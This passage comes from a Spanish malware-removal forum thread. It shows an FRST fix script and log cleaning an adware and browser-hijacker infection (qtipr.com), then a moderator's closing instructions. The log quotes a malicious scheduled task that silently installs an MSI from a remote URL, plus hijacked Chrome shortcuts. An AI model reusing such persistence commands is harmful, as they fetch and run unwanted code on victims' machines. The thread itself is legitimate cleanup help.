      ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
      ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Alberto\AppData\Local\MEGAsync\ShellExtX32.dll -> No File
      GroupPolicy: Restriction - Chrome <======= ATTENTION
      CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://goojile.info/?ri=1&uid=60a5532a2e2eeeab9b911a64bf743a26&q={searchTerms}
      BHO: Youtube AdBlock -> {95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} -> C:\Program Files (x86)\Youtube AdBlock\IEEF\hMrsfBZ.dll => No File
      FF Homepage: Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 -> hxxps://www.malwarebytes.org/restorebrowser/
      FF Extension: (Video DownloadHelper) - C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-10-30]
      FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
      FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1214154.dll [No File]
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-16] <==== ATTENTION
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Warcraft [FVD]) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb [2017-02-14]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR Extension: (Presentaciones de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-09]
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      U3 ucdrv; no ImagePath
      2017-02-09 17:33 - 2017-02-09 17:33 - 00003094 _____ C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300}
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avira
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avg
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\AVAST Software
      2017-02-09 17:03 - 2017-02-09 17:57 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Thugagh
      2017-02-09 17:03 - 2017-02-09 17:10 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zicsythifetain
      2017-02-09 17:03 - 2017-02-09 17:03 - 00006096 _____ C:\WINDOWS\System32\Tasks\Erwushprazase Configuration
      2017-02-09 17:03 - 2017-02-09 17:03 - 00005058 _____ C:\WINDOWS\System32\Tasks\Chevuge
      2017-02-09 17:00 - 2017-02-09 17:00 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zujerle
      2017-02-09 13:30 - 2017-02-09 13:30 - 00000000 ____D C:\Users\Alberto\AppData\Local\UCBrowser
      2017-02-07 15:53 - 2017-02-07 15:53 - 03086008 _____ C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe
      2017-02-15 09:53 - 2016-07-22 19:48 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\uTorrent
      Task: {8FEB47DB-6AF4-43E4-82EC-A450E7786342} - System32\Tasks\Erwushprazase Configuration => C:\Program Files (x86)\Eceent\clacay.exe
      Task: {D6B27619-ED57-41A6-B563-28F9588E867B} - System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => pcalua.exe -a "C:\Program Files (x86)\ItVffRpktW\uninstall.exe"
      Task: {EF46272C-91A2-4AE7-B9FD-68453CF46DD7} - System32\Tasks\Chevuge => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S30YJ9AF353546&amp;v=201729 /q
      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
      Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Int?rn?t ???l?r?r.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      AlternateDataStreams: C:\Windows:nlsPreferences [386]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [80850]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [364744]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1176354]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Archivos temporales de Internet:G7RosvZLTjKjBQvoMJUig [2252]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]

      CMD: ipconfig /flushdns
      CMD: ipconfig /renew
      CMD: bitsadmin /reset /allusers
      RemoveProxy:
      EmptyTemp:
      Hosts:
      end
      *****************

      Restore point was successfully created.
      Processes closed successfully.
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Windows\CurrentVersion\Run\\Chromium => value removed successfully
      HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => value removed successfully
      HKCR\CLSID\{F294D2AE-ECCF-11E6-85D5-64006A5CFC23} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} => value removed successfully
      HKCR\CLSID\{0C7A9190-EE8C-11E6-BCD2-64006A5CFC23} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => invalid subkey removed.
      HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => invalid subkey removed.
      HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => invalid subkey removed.
      HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found.
      HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj => key removed successfully
      HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => key not found.
      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => invalid subkey removed.
      HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => key not found.
      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => invalid subkey removed.
      HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => key not found.
      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => invalid subkey removed.
      HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => key not found.
      C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
      C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
      HKLM\SOFTWARE\Policies\Google => key removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} => key removed successfully
      HKCR\CLSID\{95E84BD3-3604-4AAC-B2CA-D9AC3E55B64B} => key not found.
      Firefox "homepage" removed successfully
      C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi => moved successfully
      C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi => moved successfully
      HKLM\Software\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer => key removed successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => not found
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi => moved successfully
      C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm => moved successfully
      HKLM\System\CurrentControlSet\Services\ucdrv => key removed successfully
      ucdrv => service removed successfully
      C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => moved successfully
      C:\ProgramData\Avira => moved successfully
      C:\ProgramData\Avg => moved successfully
      C:\ProgramData\AVAST Software => moved successfully
      C:\Users\Alberto\AppData\Roaming\Thugagh => moved successfully
      C:\Users\Alberto\AppData\Local\Zicsythifetain => moved successfully
      C:\WINDOWS\System32\Tasks\Erwushprazase Configuration => moved successfully
      C:\WINDOWS\System32\Tasks\Chevuge => moved successfully
      C:\Users\Alberto\AppData\Local\Zujerle => moved successfully
      C:\Users\Alberto\AppData\Local\UCBrowser => moved successfully
      C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe => moved successfully
      C:\Users\Alberto\AppData\Roaming\uTorrent => moved successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8FEB47DB-6AF4-43E4-82EC-A450E7786342} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8FEB47DB-6AF4-43E4-82EC-A450E7786342} => key removed successfully
      C:\WINDOWS\System32\Tasks\Erwushprazase Configuration => not found.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Erwushprazase Configuration => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D6B27619-ED57-41A6-B563-28F9588E867B} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D6B27619-ED57-41A6-B563-28F9588E867B} => key removed successfully
      C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => not found.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{BEFD2162-C6CF-488F-8778-A79BA873E300} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EF46272C-91A2-4AE7-B9FD-68453CF46DD7} => key removed successfully
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EF46272C-91A2-4AE7-B9FD-68453CF46DD7} => key removed successfully
      C:\WINDOWS\System32\Tasks\Chevuge => not found.
      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chevuge => key removed successfully
      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION => removed successfully
      "C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Int?rn?t ???l?r?r.lnk" => Could not move.
      C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\Users\Public\Desktop\Google Chrome.lnk => Shortcut argument removed successfully.
      C:\Windows => ":nlsPreferences" ADS removed successfully.
      C:\WINDOWS\system32\drivers => ":ucdrv-x64.sys" ADS removed successfully.
      C:\WINDOWS\system32\drivers => ":x64" ADS removed successfully.
      C:\WINDOWS\system32\drivers => ":x86" ADS removed successfully.
      C:\Users\Alberto\Configuración local => ":k7RtSr3u5tYnlX2Bwkwx" ADS removed successfully.
      C:\Users\Alberto\Configuración local => ":Lmb9BqubakMCfIXhy" ADS removed successfully.
      "C:\Users\Alberto\AppData\Local" => ":k7RtSr3u5tYnlX2Bwkwx" ADS not found.
      "C:\Users\Alberto\AppData\Local" => ":Lmb9BqubakMCfIXhy" ADS not found.
      C:\Users\Alberto\AppData\Local\Archivos temporales de Internet => ":G7RosvZLTjKjBQvoMJUig" ADS removed successfully.
      "C:\Users\Alberto\AppData\Local\Datos de programa" => ":k7RtSr3u5tYnlX2Bwkwx" ADS not found.
      "C:\Users\Alberto\AppData\Local\Datos de programa" => ":Lmb9BqubakMCfIXhy" ADS not found.
      C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`27hfm" ADS removed successfully.

      ========= ipconfig /flushdns =========


      Configuraci¢n IP de Windows

      Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS.

      ========= End of CMD: =========


      ========= ipconfig /renew =========


      Configuraci¢n IP de Windows

      No se puede realizar ninguna operaci¢n en Conexi¢n de red Bluetooth 3 mientras los medios
      est‚n desconectados.
      No se puede realizar ninguna operaci¢n en Conexi¢n de *rea local* 4 mientras los medios
      est‚n desconectados.
      No se puede realizar ninguna operaci¢n en Conexi¢n de *rea local* 2 mientras los medios
      est‚n desconectados.
      No se puede realizar ninguna operaci¢n en Ethernet mientras los medios
      est‚n desconectados.

      Adaptador de Ethernet Conexi¢n de red Bluetooth 3:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS espec¡fico para la conexi¢n. . :

      Adaptador de LAN inal*mbrica Conexi¢n de *rea local* 4:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS espec¡fico para la conexi¢n. . :

      Adaptador de LAN inal*mbrica Conexi¢n de *rea local* 2:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS espec¡fico para la conexi¢n. . :

      Adaptador de LAN inal*mbrica Wi-Fi:

      Sufijo DNS espec¡fico para la conexi¢n. . :
      V¡nculo: direcci¢n IPv6 local. . . : fe80::8459:1194:32a4:ebd5%5
      Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.1.3
      M*scara de subred . . . . . . . . . . . . : 255.255.255.0
      Puerta de enlace predeterminada . . . . . : 192.168.1.1

      Adaptador de Ethernet Ethernet:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS espec¡fico para la conexi¢n. . : medusa.gobiernodecanarias.net

      Adaptador de t£nel isatap.{CD4BB8C7-8D07-490D-A1EF-88B67DEA2363}:

      Estado de los medios. . . . . . . . . . . : medios desconectados
      Sufijo DNS espec¡fico para la conexi¢n. . :

      ========= End of CMD: =========


      ========= bitsadmin /reset /allusers =========


      BITSADMIN version 3.0 [ 7.7.9600 ]
      BITS administration utility.
      (C) Copyright 2000-2006 Microsoft Corp.

      BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
      Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

      {81F1D534-C545-40E2-854F-EA85CD90BCF4} canceled.
      {779AE08A-CAF5-407D-AE25-FEB06847D1BD} canceled.
      {9C472B33-F7EC-4358-ADCD-EF9A9695E01B} canceled.
      {78DFB215-A980-47A0-B42E-BD014D8332E3} canceled.
      4 out of 4 jobs canceled.

      ========= End of CMD: =========


      ========= RemoveProxy: =========

      HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
      HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


      ========= End of RemoveProxy: =========

      C:\Windows\System32\Drivers\etc\hosts => moved successfully
      Hosts restored successfully.

      =========== EmptyTemp: ==========

      BITS transfer queue => 8388608 B
      DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 44897433 B
      Java, Flash, Steam htmlcache => 761 B
      Windows/system/drivers => 158009954 B
      Edge => 0 B
      Chrome => 16631808 B
      Firefox => 29592538 B
      Opera => 0 B

      Temp, IE cache, history, cookies, recent:
      Default => 0 B
      Users => 0 B
      ProgramData => 0 B
      Public => 0 B
      systemprofile => 1959245 B
      systemprofile32 => 128 B
      LocalService => 23106 B
      NetworkService => 5701632 B
      UpdatusUser => 0 B
      Alberto => 83513822810 B

      RecycleBin => 5007524 B
      EmptyTemp: => 78 GB temporary data Removed.

      ================================


      The system needed a reboot.

      ==== End of Fixlog 17:03:25 ====

    9. #9
      Moderadora Gral.
      Avatar de @Daniela
      Registrado
      abr 2011
      Ubicación
      España
      Mensajes
      23.121

      Re: Eliminar qtipr.com

      Hola Darkor

      Sigue estos pasos, para eliminar las herramientas utilizadas:

      • Utiliza de nuevo >> Descarga >> DelFix
        • Doble clic para ejecutarlo.(Si usas Windows Vista/7 u 8 presiona clic derecho y selecciona "Ejecutar como Administrador.")
        • Marca todas las casillas.
      • Pulsar en Run.

        Se abrirá el informe (DelFix.txt), revisa que se hayan eliminado las herramientas utilizadas.


      Gracias a ti por confiar en ForoSpyware. Ha sido un placer ayudarte

      Nos alegramos que se te haya resuelto Damos el tema por solucionado.


      Si deseas REABRIR ESTE TEMA presiona para reportarlo Como Reportar Mensajes?.

      Como recomendación final, te invitamos a seguirnos en nuestros canales de difusión: Blog, Twitter, Facebook, para estar al tanto de los nuevos malwares y cómo prevenirlos.
      *** Tema solucionado ***


      Un saludo
      ✿◕‿◕✿ La impaciencia no es buena compañía ✿◕‿◕✿

      * Síguenos en nuestro Twitter y hazte nuestro amigo en Facebook.
      * Infórmate de las ultimas amenazas de la red desde: InfoSpyware Blog
      * No se resuelven dudas por Privados ni por E-mail, ya que para eso esta el foro.